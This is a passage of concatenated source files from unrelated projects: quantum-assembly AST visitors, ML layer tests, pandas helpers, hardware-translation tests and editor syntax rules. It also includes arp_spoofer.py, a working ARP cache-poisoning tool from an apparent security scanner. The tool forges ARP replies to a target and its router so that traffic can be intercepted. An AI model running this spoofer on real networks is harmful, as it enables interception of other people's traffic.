self.upgradeTime = upgradeTime
|
source/openqasm/visitor.py | shiyunon/openqasm | 603 | 11178159 | from typing import Optional, TypeVar, Generic
from openqasm.ast import QASMNode
T = TypeVar("T")
class QASMVisitor(Generic[T]):
"""
A node visitor base class that walks the abstract syntax tree and calls a
visitor function for every node found. This function may return a value
which is forwarded by the `visit` method.
Modified from the implementation in ast.py in the Python standard library.
We added the context argument to the visit method. It allows the visitor
to hold temporary state while visiting the nodes.
The optional context argument in visit/generic_visit methods can be used to hold temporary
information that we do not want to hold in either the AST or the visitor themselves.
"""
def visit(self, node: QASMNode, context: Optional[T] = None):
"""Visit a node."""
method = "visit_" + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
# The visitor method may not have the context argument.
if context:
return visitor(node, context)
else:
return visitor(node)
def generic_visit(self, node: QASMNode, context: Optional[T] = None):
"""Called if no explicit visitor function exists for a node."""
for value in node.__dict__.values():
if not isinstance(value, list):
value = [value]
for item in value:
if isinstance(item, QASMNode):
if context:
self.visit(item, context)
else:
self.visit(item)
class QASMTransformer(QASMVisitor[T]):
"""
A :class:`QASMVisitor` subclass that walks the abstract syntax tree and
allows modification of nodes.
Modified from the implementation in ast.py in the Python standard library
"""
def generic_visit(self, node: QASMNode, context: Optional[T] = None) -> QASMNode:
for field, old_value in node.__dict__.items():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, QASMNode):
value = self.visit(value, context) if context else self.visit(value)
if value is None:
continue
elif not isinstance(value, QASMNode):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, QASMNode):
new_node = self.visit(old_value, context) if context else self.visit(old_value)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
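# Minimal usage sketch: a visitor that counts node types by threading a dict
# through the traversal as the context. Note that `visit` only forwards a
# truthy context, so seed the dict before starting (names here illustrative).
class NodeCounter(QASMVisitor[dict]):
    def generic_visit(self, node: QASMNode, context: Optional[dict] = None):
        if context is not None:
            name = type(node).__name__
            context[name] = context.get(name, 0) + 1
        super().generic_visit(node, context)
# counts = {'_seed': 0}; NodeCounter().visit(program_node, counts)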
|
zippy/edu.uci.python.test/src/tests/generator-yield-expression-test.py | lucapele/pele-c | 319 | 11178178 | # zwei 06/28/2014
# generator test: yield used as an expression, driven externally via send()
def generator(n):
for i in range(n):
x = yield i * 2
print(x)
gen = generator(5)
it = 0
gen.__next__()
try:
while True:
gen.send(it)
it += 1
except StopIteration:
    pass
|
test/layers/operations/test_norm.py | dawnclaude/onnx2keras | 115 | 11178195 | import torch.nn as nn
import torch
import numpy as np
import pytest
from test.utils import convert_and_test
class FNormTest(nn.Module):
"""
Test for nn.functional types
"""
def __init__(self, dim, keepdim):
super(FNormTest, self).__init__()
self.dim = dim
self.keepdim = keepdim
def forward(self, x):
x = torch.norm(x, p=2, dim=self.dim, keepdim=self.keepdim)
return x
# TODO: Not working with dim=[2,3] and change_ordering=False ???? error about 0.0001-0.001
@pytest.mark.repeat(10)
@pytest.mark.parametrize('change_ordering', [True, False])
@pytest.mark.parametrize('dim', [[1, 2], [1, 3]])
@pytest.mark.parametrize('epsilon', [5e-5])
@pytest.mark.parametrize('keepdim', [True, False])
def test_norm(change_ordering, dim, epsilon, keepdim):
model = FNormTest(dim, keepdim)
model.eval()
input_np = np.random.uniform(0, 1, (1, 3, 224, 224))
error = convert_and_test(model, input_np, verbose=False, change_ordering=change_ordering, epsilon=epsilon)
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/src/activation/relu.py | angliu-bu/ILearnDeepLearning.py | 1,093 | 11178206 | import numpy as np
from src.base import Layer
class ReluLayer(Layer):
def __init__(self):
self._z = None
def forward_pass(self, a_prev: np.array, training: bool) -> np.array:
"""
:param a_prev - ND tensor with shape (n, ..., channels)
:output ND tensor with shape (n, ..., channels)
------------------------------------------------------------------------
n - number of examples in batch
"""
self._z = np.maximum(0, a_prev)
return self._z
def backward_pass(self, da_curr: np.array) -> np.array:
"""
:param da_curr - ND tensor with shape (n, ..., channels)
:output ND tensor with shape (n, ..., channels)
------------------------------------------------------------------------
n - number of examples in batch
"""
dz = np.array(da_curr, copy=True)
dz[self._z <= 0] = 0
return dz
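# Quick sanity check (standalone sketch, assuming the repo's src/ layout is
# importable): forward clips negatives to zero; backward zeroes gradients
# wherever the stored activation was zero.
if __name__ == "__main__":
    layer = ReluLayer()
    a_prev = np.array([[-1.0, 2.0], [3.0, -4.0]])
    print(layer.forward_pass(a_prev, training=True))   # [[0. 2.] [3. 0.]]
    print(layer.backward_pass(np.ones_like(a_prev)))   # [[0. 1.] [1. 0.]]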
|
blender/arm/logicnode/animation/LN_set_bone_fk_ik_only.py | onelsonic/armory | 2,583 | 11178216 | from arm.logicnode.arm_nodes import *
class SetBoneFkIkOnlyNode(ArmLogicTreeNode):
"""Set particular bone to be animated by Forward kinematics or Inverse kinematics only. All other animations will be ignored"""
bl_idname = 'LNSetBoneFkIkOnlyNode'
bl_label = 'Set Bone FK IK Only'
arm_version = 1
arm_section = 'armature'
def arm_init(self, context):
self.add_input('ArmNodeSocketAction', 'In')
self.add_input('ArmNodeSocketObject', 'Object')
self.add_input('ArmStringSocket', 'Bone')
self.add_input('ArmBoolSocket', 'FK or IK only')
self.add_output('ArmNodeSocketAction', 'Out')
|
docpkg/config.py | icgood/continuous-docs | 336 | 11178228 | """This module contains the configuration routines."""
from typing import Optional, TypeVar
T = TypeVar('T')
class MyConfig:
"""Loads and manages the configuration.
Args:
filename: The filename to load configs from.
"""
def __init__(self, filename: str) -> None:
pass
def get_option(self, name: str, default: Optional[T] = None) -> T:
"""Returns the requested option from the loaded configs.
:param name: The option name to get.
:param default: The default to return, if the option was not found
in the configs.
"""
pass
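# Usage sketch (illustrative filename and option name):
#   config = MyConfig('app.conf')
#   debug = config.get_option('debug', default=False)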
|
janitor/functions/coalesce.py | farhanreynaldo/pyjanitor | 674 | 11178261 | from typing import Optional, Union
import pandas as pd
import pandas_flavor as pf
from janitor.utils import check, deprecated_alias
from janitor.functions.utils import _select_column_names
@pf.register_dataframe_method
@deprecated_alias(columns="column_names", new_column_name="target_column_name")
def coalesce(
df: pd.DataFrame,
*column_names,
target_column_name: Optional[str] = None,
default_value: Optional[Union[int, float, str]] = None,
) -> pd.DataFrame:
"""
Coalesce two or more columns of data in order of column names provided.
This finds the first non-missing value at each position.
This method does not mutate the original DataFrame.
TODO: Turn the example in this docstring into a Jupyter notebook.
Example:
```python
import pandas as pd
import janitor as jn
df = pd.DataFrame({"A": [1, 2, np.nan],
"B": [np.nan, 10, np.nan],
"C": [5, 10, 7]})
A B C
0 1.0 NaN 5
1 2.0 10.0 10
2 NaN NaN 7
df.coalesce('A', 'B', 'C',
target_column_name = 'D')
A B C D
0 1.0 NaN 5 1.0
1 2.0 10.0 10 2.0
2 NaN NaN 7 7.0
```
If no target column is provided, then the first column is updated,
with the null values removed:
```python
df.coalesce('A', 'B', 'C')
A B C
0 1.0 NaN 5
1 2.0 10.0 10
2 7.0 NaN 7
```
If nulls remain, you can fill it with the `default_value`:
```python
df = pd.DataFrame({'s1':[np.nan,np.nan,6,9,9],
's2':[np.nan,8,7,9,9]})
s1 s2
0 NaN NaN
1 NaN 8.0
2 6.0 7.0
3 9.0 9.0
4 9.0 9.0
df.coalesce('s1', 's2',
target_column_name = 's3',
default_value = 0)
s1 s2 s3
0 NaN NaN 0.0
1 NaN 8.0 8.0
2 6.0 7.0 6.0
3 9.0 9.0 9.0
4 9.0 9.0 9.0
```
Functional usage syntax:
```python
df = coalesce(df, 'col1', 'col2', target_column_name ='col3')
```
Method chaining syntax:
```python
import pandas as pd
import janitor
df = pd.DataFrame(...).coalesce('col1', 'col2')
```
The first example will create a new column called `col3` with values from
`col2` inserted where values from `col1` are `NaN`.
The second example will update the values of `col1`,
since it is the first column in `column_names`.
This is more syntactic diabetes! For R users, this should look familiar to
`dplyr`'s `coalesce` function; for Python users, the interface
should be more intuitive than the `pandas.Series.combine_first`
method.
:param df: A pandas DataFrame.
:param column_names: A list of column names.
:param target_column_name: The new column name after combining.
If `None`, then the first column in `column_names` is updated,
with the Null values replaced.
:param default_value: A scalar to replace any remaining nulls
after coalescing.
:returns: A pandas DataFrame with coalesced columns.
:raises ValueError: if length of `column_names` is less than 2.
"""
if not column_names:
return df
if len(column_names) < 2:
raise ValueError(
"""
The number of columns to coalesce
should be a minimum of 2.
"""
)
column_names = [*column_names]
column_names = _select_column_names(column_names, df)
if target_column_name:
check("target_column_name", target_column_name, [str])
if default_value:
check("default_value", default_value, [int, float, str])
if target_column_name is None:
target_column_name = column_names[0]
# bfill/ffill combo is faster than combine_first
outcome = (
df.filter(column_names)
.bfill(axis="columns")
.ffill(axis="columns")
.iloc[:, 0]
)
if outcome.hasnans and (default_value is not None):
outcome = outcome.fillna(default_value)
return df.assign(**{target_column_name: outcome})
|
pymtl3/passes/backends/verilog/test/TranslationImport_adhoc_test.py | jbrzozo24/pymtl3 | 152 | 11178277 | #=========================================================================
# TranslationImport_adhoc_test.py
#=========================================================================
# Author : <NAME>
# Date : Jun 5, 2019
"""Test ad-hoc components with SystemVerilog translation and import."""
import pytest
from pymtl3.datatypes import Bits16, Bits32, bitstruct, concat
from pymtl3.dsl import Component, InPort, Interface, OutPort, update
from pymtl3.passes.backends.verilog import VerilogPlaceholderPass
from pymtl3.passes.rtlir.util.test_utility import get_parameter
from pymtl3.stdlib.test_utils import TestVectorSimulator
from .. import VerilogTranslationImportPass
from ..testcases import (
CaseChildExplicitModuleName,
CaseMultiPlaceholderImport,
CasePlaceholderTranslationRegIncr,
CasePlaceholderTranslationVReg,
CaseVIncludePopulation,
CaseVLibsTranslation,
)
from ..translation.behavioral.test.VBehavioralTranslatorL1_test import (
test_verilog_behavioral_L1,
)
from ..translation.behavioral.test.VBehavioralTranslatorL2_test import (
test_verilog_behavioral_L2,
)
from ..translation.behavioral.test.VBehavioralTranslatorL3_test import (
test_verilog_behavioral_L3,
)
from ..translation.behavioral.test.VBehavioralTranslatorL4_test import (
test_verilog_behavioral_L4,
)
from ..translation.behavioral.test.VBehavioralTranslatorL5_test import (
test_verilog_behavioral_L5,
)
from ..translation.structural.test.VStructuralTranslatorL1_test import (
test_verilog_structural_L1,
)
from ..translation.structural.test.VStructuralTranslatorL2_test import (
test_verilog_structural_L2,
)
from ..translation.structural.test.VStructuralTranslatorL3_test import (
test_verilog_structural_L3,
)
from ..translation.structural.test.VStructuralTranslatorL4_test import (
test_verilog_structural_L4,
)
def run_test( case ):
_m = case.DUT()
_m.elaborate()
_m.set_metadata( VerilogTranslationImportPass.enable, True )
_m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( _m )
sim = TestVectorSimulator( m, case.TV, case.TV_IN, case.TV_OUT )
sim.run_test()
@pytest.mark.parametrize(
'case', get_parameter('case', test_verilog_behavioral_L1) + \
get_parameter('case', test_verilog_behavioral_L2) + \
get_parameter('case', test_verilog_behavioral_L3) + \
get_parameter('case', test_verilog_behavioral_L4) + \
get_parameter('case', test_verilog_behavioral_L5) + \
get_parameter('case', test_verilog_structural_L1) + \
get_parameter('case', test_verilog_structural_L2) + \
get_parameter('case', test_verilog_structural_L3) + \
get_parameter('case', test_verilog_structural_L4) + [
CasePlaceholderTranslationVReg,
CasePlaceholderTranslationRegIncr,
CaseVIncludePopulation,
CaseVLibsTranslation,
CaseChildExplicitModuleName,
]
)
def test_verilog_translation_import_adhoc( case ):
run_test( case )
def test_pymtl_top_multi_placeholder():
case = CaseMultiPlaceholderImport
m = case.DUT()
m.elaborate()
m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( m )
sim = TestVectorSimulator( m, case.TV, case.TV_IN, case.TV_OUT )
sim.run_test()
def test_bitstruct_same_name_different_fields():
class A:
@bitstruct
class A:
a: Bits32
class B:
@bitstruct
class A:
a: Bits16
class InIfc( Interface ):
def construct( s, Type ):
s.in_ = InPort( Type )
class OutIfc( Interface ):
def construct( s, Type ):
s.out = OutPort( Type )
class DUT( Component ):
def construct( s ):
s.in1 = InIfc(A.A)
s.in2 = InIfc(B.A)
s.out2 = OutPort(Bits16)
s.out2 //= s.in2.in_.a
class TMP( Component ):
def construct( s ):
s.out = OutPort(B.A)
@update
def drive():
s.out @= 0
class Top( Component ):
def construct( s ):
s.dut = DUT()
s.tmp = TMP()
s.tmp.out //= s.dut.in2.in_
m = Top()
m.elaborate()
m.dut.set_metadata( VerilogTranslationImportPass.enable, True )
m.apply( VerilogPlaceholderPass() )
m = VerilogTranslationImportPass()( m )
m.dut.finalize()
|
src/lib/attacks/arp_spoof/arp_spoofer.py | FrancescoPenasa/vault_scanner | 230 | 11178293 | #! /usr/bin/python
import subprocess
import os
import re
import colors
import sys
import time
import scapy.all as scapy
from io import StringIO
class ARPSpoof(object):
def __init__(self, ip=None):
self.target_ip = None
self.router_ip = None
self.target_mac = None
self.router_mac = None
self.no_of_packets = 0
self.INTER = 0.5
self.is_root()
if ip is not None:
self.target_ip = ip
else:
self.get_target_IP()
if self.router_ip is None:
self.get_router_IP()
if self.target_mac is None:
self.target_mac = self.getMAC(self.target_ip, 'TARGET')
if self.router_mac is None:
self.router_mac = self.getMAC(self.router_ip, 'ROUTER')
@staticmethod
def is_root():
"""
Checks if program is running as root or not
"""
if os.geteuid() != 0:
colors.error('Please run as root')
sys.exit(1)
else:
colors.success('Running as root')
@staticmethod
def validateIP(ip: str):
"""
Check whether the input IP is valid or not
"""
if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'
'(\.(?!$)|$)){4}$', ip):
return True
@staticmethod
def validateMAC(mac):
"""
Check whether the input MAC is valid or not
"""
if re.match("[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$",
mac.lower()):
return True
@staticmethod
def capture_output(to_perform):
capture = StringIO()
temp_stdout = sys.stdout
sys.stdout = capture
to_perform.show()
sys.stdout = temp_stdout
return capture.getvalue()
def get_router_IP(self):
"""
Finds the router IP address
"""
colors.info('Finding Router IP address...')
command_process = subprocess.Popen(['route', '-n'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, error = command_process.communicate()
if error:
print(error.decode('utf-8'))
sys.exit(1)
output = output.decode('utf-8')
ip_candidates = re.findall(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b",
output)
colors.success('Router IP found is : {}'.format(ip_candidates[1]))
        val = str(input('>> Continue with this IP address (Y/y) '
                        'or enter a different IP address : ')).strip()
if val == 'Y' or val == 'y':
self.router_ip = ip_candidates[1]
colors.info('Router IP set to : {}'.format(self.router_ip))
elif self.validateIP(val):
self.router_ip = val
colors.info('Router IP set to : {}'.format(self.router_ip))
else:
colors.error('Please enter a valid Router IP address')
self.get_router_IP()
def get_target_IP(self):
"""
Fetches target IP to spoof
"""
if self.target_ip is None:
value = str(input('>> No target IP selected, please enter an IP '
'address or run network scan (Enter "S/s") : '
)).strip()
if value == 'S' or value == 's':
self.networkScan()
elif self.validateIP(value):
colors.info('Selected target IP is : {}'.format(value))
self.target_ip = value
else:
colors.error('Please enter a valid IP address to continue...')
self.get_target_IP()
def getMAC(self, IP, name):
"""
Fetches MAC address of the selected IP
"""
arp_packet = scapy.ARP(pdst=IP)
broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_broadcast = broadcast/arp_packet
broadcast = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]
mac_addr_str = self.capture_output(broadcast)
mac_addr = re.findall(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w',
mac_addr_str)[0]
mac_addr = str(mac_addr).strip()
colors.success('Found MAC address for {} : {} is : {}'
.format(name, IP, mac_addr))
        val = str(input('>> Enter (Y/y) to continue or enter MAC address : '))\
.strip()
if val == 'Y' or val == 'y':
return mac_addr
elif self.validateMAC(val):
colors.info('Setting MAC address for {} : {} : {}'
.format(name, IP, val))
return val
else:
colors.error('Please enter a valid MAC address...')
            return self.getMAC(IP, name)
def networkScan(self):
"""
Peform ARP scanning over the IP range
"""
ip = str(input('>> Enter the IP address to start scanning : '))\
.strip()
if self.validateIP(ip):
try:
colors.info('Initiating ARP Scan')
from lib.scanner.ip_scanner import arp_scanner
arpScanObj = arp_scanner.ARPScan(ip=ip,
start_ip=None,
end_ip=None,
threads=50)
total_index, result_dict = arpScanObj.threadingScan()
index = -1
while index > total_index or index <= 0:
index = int(input('>> Enter the index of the target IP: '))
self.target_ip = result_dict[index][0]
self.target_mac = result_dict[index][1]
colors.success('Target IP set to: {}'.format(self.target_ip))
colors.success('Target MAC set to: {}'.format(self.target_mac))
except ImportError:
colors.error('Could not import the required module.')
except Exception as e:
print(e)
else:
colors.error('Please enter a valid IP address...')
self.networkScan()
def generatePacket(self):
"""
Generates scapy packet for spoofing
the target and the router
"""
target_arp_packet = scapy.ARP(op=2, hwdst=self.target_mac,
pdst=self.target_ip, psrc=self.router_ip)
router_arp_packet = scapy.ARP(op=2, hwdst=self.router_mac,
pdst=self.router_ip, psrc=self.target_ip)
return target_arp_packet, router_arp_packet
def restore(self):
"""
Restores the IP tables of the target and the router
to the default state (before ARP spoof attack)
"""
colors.info('Restoring IP tables')
target_arp_packet = scapy.ARP(op=2, pdst=self.target_ip,
hwdst=self.target_mac,
psrc=self.router_ip,
hwsrc=self.router_mac)
router_arp_packet = scapy.ARP(op=2, pdst=self.router_ip,
hwdst=self.router_mac,
psrc=self.target_ip,
hwsrc=self.target_mac)
COUNT = 10 # Send 10 packets to restore
while COUNT > 0:
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
COUNT = COUNT - 1
colors.success('ARP Table restored')
def startSpoof(self):
"""
Starts ARP spoofing
"""
t1 = time.time()
colors.info('ARP Spoofing started...')
colors.info('Press CTRL+C to exit...')
try:
while True:
target_arp_packet, router_arp_packet = self.generatePacket()
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
self.no_of_packets = self.no_of_packets + 1
print('[+] Packets sent : {}'.format(self.no_of_packets),
end='\r')
time.sleep(self.INTER)
except KeyboardInterrupt:
colors.info('Stopping ARP spoof')
except Exception as e:
print(e)
finally:
self.restore()
t2 = time.time()
colors.success('ARP Spoof completed in : {}'.format(t2-t1))
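# Usage sketch (requires root; the IP is illustrative, remaining details are
# gathered via the class's interactive prompts):
#   spoofer = ARPSpoof(ip='192.168.1.10')
#   spoofer.startSpoof()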
|
leo/modes/scala.py | ATikhonov2/leo-editor | 1,550 | 11178323 | # Leo colorizer control file for scala mode.
# This file is in the public domain.
# Properties for scala mode.
properties = {
"commentEnd": "*/",
"commentStart": "/*",
"doubleBracketIndent": "false",
"indentCloseBrackets": "}",
"indentOpenBrackets": "{",
"indentPrevLine": "\\s*(((if|while)\\s*\\(|else\\s*(\\{|$)|else\\s+if\\s*\\(|case\\s+.+:|default:)[^;]*|for\\s*\\(.*)",
"indentSize": "2",
"lineComment": "//",
"lineUpClosingBracket": "true",
"noTabs": "true",
"tabSize": "2",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for scala_main ruleset.
scala_main_attributes_dict = {
"default": "null",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_primary ruleset.
scala_primary_attributes_dict = {
"default": "null",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_pattern ruleset.
scala_pattern_attributes_dict = {
"default": "NULL",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for scala_scaladoc ruleset.
scala_scaladoc_attributes_dict = {
"default": "COMMENT3",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_scaladoc_pre ruleset.
scala_scaladoc_pre_attributes_dict = {
"default": "COMMENT3",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_tag ruleset.
scala_xml_tag_attributes_dict = {
"default": "LABEL",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_text ruleset.
scala_xml_text_attributes_dict = {
"default": "COMMENT4",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Attributes dict for scala_xml_comment ruleset.
scala_xml_comment_attributes_dict = {
"default": "COMMENT2",
"digit_re": "(0[lL]?|[1-9]\\d{0,9}(\\d{0,9}[lL])?|0[xX]\\p{XDigit}{1,8}(\\p{XDigit}{0,8}[lL])?|0[0-7]{1,11}([0-7]{0,11}[lL])?|([0-9]+\\.[0-9]*|\\.[0-9]+)([eE][+-]?[0-9]+)?[fFdD]?|[0-9]+([eE][+-]?[0-9]+[fFdD]?|([eE][+-]?[0-9]+)?[fFdD]))",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for scala mode.
attributesDictDict = {
"scala_main": scala_main_attributes_dict,
"scala_pattern": scala_pattern_attributes_dict,
"scala_primary": scala_primary_attributes_dict,
"scala_scaladoc": scala_scaladoc_attributes_dict,
"scala_scaladoc_pre": scala_scaladoc_pre_attributes_dict,
"scala_xml_comment": scala_xml_comment_attributes_dict,
"scala_xml_tag": scala_xml_tag_attributes_dict,
"scala_xml_text": scala_xml_text_attributes_dict,
}
# Keywords dict for scala_main ruleset.
scala_main_keywords_dict = {}
# Keywords dict for scala_primary ruleset.
scala_primary_keywords_dict = {
### EKR
# "\t ": "",
# "\n": "",
# " ": "",
# " ": "",
"=": "",
">": "",
"Actor": "",
"ActorProxy": "",
"ActorTask": "",
"ActorThread": "",
"AllRef": "",
"Any": "",
"AnyRef": "",
"Application": "",
"AppliedType": "",
"Array": "",
"ArrayBuffer": "",
"Attribute": "",
"Boolean": "",
"BoxedArray": "",
"BoxedBooleanArray": "",
"BoxedByteArray": "",
"BoxedCharArray": "",
"Buffer": "",
"BufferedIterator": "",
"Byte": "",
"Char": "",
"Character": "",
"Console": "",
"Double": "",
"Enumeration": "",
"Float": "",
"Fluid": "",
"Function": "",
"IScheduler": "",
"ImmutableMapAdaptor": "",
"ImmutableSetAdaptor": "",
"Int": "",
"Integer": "",
"Iterable": "",
"List": "",
"Long": "",
"Nil": "",
"None": "",
"Option": "",
"Pair": "",
"PartialFunction": "",
"Pid": "",
"Predef": "",
"PriorityQueue": "",
"PriorityQueueProxy": "",
"Reaction": "",
"Ref": "",
"RemoteActor": "",
"Responder": "",
"RichInt": "",
"RichString": "",
"Rule": "",
"RuleTransformer": "",
"SUnit": "",
"ScalaRunTime": "",
"Scheduler": "",
"Script": "",
"Short": "",
"Some": "",
"Stream": "",
"String": "",
"Symbol": "",
"TIMEOUT": "",
"TcpService": "",
"TcpServiceWorker": "",
"TimerThread": "",
"Unit": "",
"WorkerThread": "",
"abstract": "",
"boolean": "",
"byte": "",
"case": "",
"catch": "",
"char": "",
"class": "",
"def": "",
"do": "",
"double": "",
"else": "",
"extends": "",
"false": "",
"final": "",
"finally": "",
"float": "",
"for": "",
"forSome": "",
"if": "",
"implicit": "",
"import": "",
"int": "",
"lazy": "",
"long": "",
"match": "",
"new": "",
"null": "",
"object": "",
"override": "",
"package": "",
"private": "",
"protected": "",
"requires": "",
"return": "",
"sealed": "",
"short": "",
"super": "",
"this": "",
"throw": "",
"trait": "",
"true": "",
"try": "",
"type": "",
"unit": "",
"val": "",
"var": "",
"while": "",
"with": "",
"yield": "",
}
# Keywords dict for scala_pattern ruleset.
scala_pattern_keywords_dict = {}
# Keywords dict for scala_scaladoc ruleset.
scala_scaladoc_keywords_dict = {
# "\n": "",
# " ": "",
# " ": "",
"@access": "",
"@author": "",
"@beaninfo": "",
"@bon": "",
"@bug": "",
"@complexity": "",
"@deprecated": "",
"@design": "",
"@docroot": "",
"@ensures": "",
"@equivalent": "",
"@example": "",
"@exception": "",
"@generates": "",
"@guard": "",
"@hides": "",
"@history": "",
"@idea": "",
"@invariant": "",
"@link": "",
"@modifies": "",
"@overrides": "",
"@param": "",
"@post": "",
"@pre": "",
"@references": "",
"@requires": "",
"@return": "",
"@review": "",
"@see": "",
"@serial": "",
"@serialData": "",
"@serialField": "",
"@serialdata": "",
"@serialfield": "",
"@since": "",
"@spec": "",
"@throws": "",
"@todo": "",
"@uses": "",
"@values": "",
"@version": "",
}
# Keywords dict for scala_scaladoc_pre ruleset.
scala_scaladoc_pre_keywords_dict = {}
# Keywords dict for scala_xml_tag ruleset.
scala_xml_tag_keywords_dict = {}
# Keywords dict for scala_xml_text ruleset.
scala_xml_text_keywords_dict = {}
# Keywords dict for scala_xml_comment ruleset.
scala_xml_comment_keywords_dict = {}
# Dictionary of keywords dictionaries for scala mode.
keywordsDictDict = {
"scala_main": scala_main_keywords_dict,
"scala_pattern": scala_pattern_keywords_dict,
"scala_primary": scala_primary_keywords_dict,
"scala_scaladoc": scala_scaladoc_keywords_dict,
"scala_scaladoc_pre": scala_scaladoc_pre_keywords_dict,
"scala_xml_comment": scala_xml_comment_keywords_dict,
"scala_xml_tag": scala_xml_tag_keywords_dict,
"scala_xml_text": scala_xml_text_keywords_dict,
}
# Rules for scala_main ruleset.
def scala_rule0(colorer, s, i):
return colorer.match_mark_following(s, i, kind="label", pattern="@",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
# Rules dict for scala_main ruleset.
rulesDict1 = {
"@": [scala_rule0,],
}
# Rules for scala_primary ruleset.
def scala_rule1(colorer, s, i):
return colorer.match_seq(s, i, kind="comment1", seq="/**/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="//",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def scala_rule3(colorer, s, i):
return colorer.match_span(s, i, kind="comment3", begin="/**", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::scaladoc",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="/*", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule5(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="<!--",
at_line_start=False, at_whitespace_end=True, at_word_start=False, delegate="scala::xml_comment")
def scala_rule6(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="<\\/?\\w*",
at_line_start=False, at_whitespace_end=True, at_word_start=False, delegate="scala::xml_tag")
